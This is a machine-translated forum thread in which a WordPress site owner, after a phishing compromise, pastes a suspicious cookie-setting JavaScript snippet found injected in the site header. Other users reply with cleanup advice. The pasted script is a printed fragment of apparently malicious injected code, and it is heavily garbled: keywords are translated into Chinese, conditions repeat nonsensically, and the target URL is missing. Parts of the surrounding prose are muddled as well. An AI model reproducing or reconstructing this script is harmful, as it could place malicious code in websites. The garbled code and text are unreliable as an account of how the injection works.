Wordpress 这是什么？谷歌分析cookie还是恶意软件？

我有一个WordPress安装，被一个网络钓鱼操作严重攻击。我以为我的安全性基本上得到了保障，但我在标题中发现了这一点：

var a=document.cookie；document.cookie=“hop=”+转义（“hop”）+“路径=/”；var b=navigator.appVersion，c=”“+document.cookie，d=null，e=0，f=0；若（c.长度>c.长度>0）是（c.长度>0）的，若（c.长度>0）是（c.长度>0）的，若（c.长度>0）是（c.长度>0）是（c.长度>0）是（c.长度>0）若（c.长度>0）是（c.长度；若（c.长度）是（c.长度>长度>长度>0）是（c.长度；若）是（c.长度；若（c.长度）是）是）是（c.长度；c.长度；d）是（c.长度；d=c.长度；d=c.长度；d=c.c.长度；d=c.c.c.c.c.c.c.c.c.索引（c.c.c.索引）是（c.长度；d=c.c.d=c.索引索引）是（c.索引）是（c.索引；d=c.索引（c.索引（c.索引）ime（）+8E7）；document.cookie=“hip=“+escape（“hip”）+”expires=“+dt.togmString（）+”path=/”document.write（“”）}

最后的那个URL非常可疑。我在谷歌上搜索，但没有找到线索：-(

我还没有在我的WP安装中找到代码源。它没有写入模板文件或数据库。正在更新WP安装

有人知道这一点吗？
这对我来说很奇怪。也许可以尝试重新安装wordpress并选择非常复杂的密码，这样就没有未经授权的人可以访问您的网站。您可能想从页面中删除google分析代码，看看这是否有什么不同。复杂密码包括数字、大小写字母、斜杠和任何你能想到的东西。确保它比8个字母长。如果你的网站被感染，请立即从网站上取下它，直到你确定它没有感染为止。
如果网站被感染，浏览itOops不是一个好主意。是的，对不起……：-（答案发现：哎哟！所有密码都被改成了20个字符串。据说javascript被禁用，网站被停用，但很难找到问题的根源。）。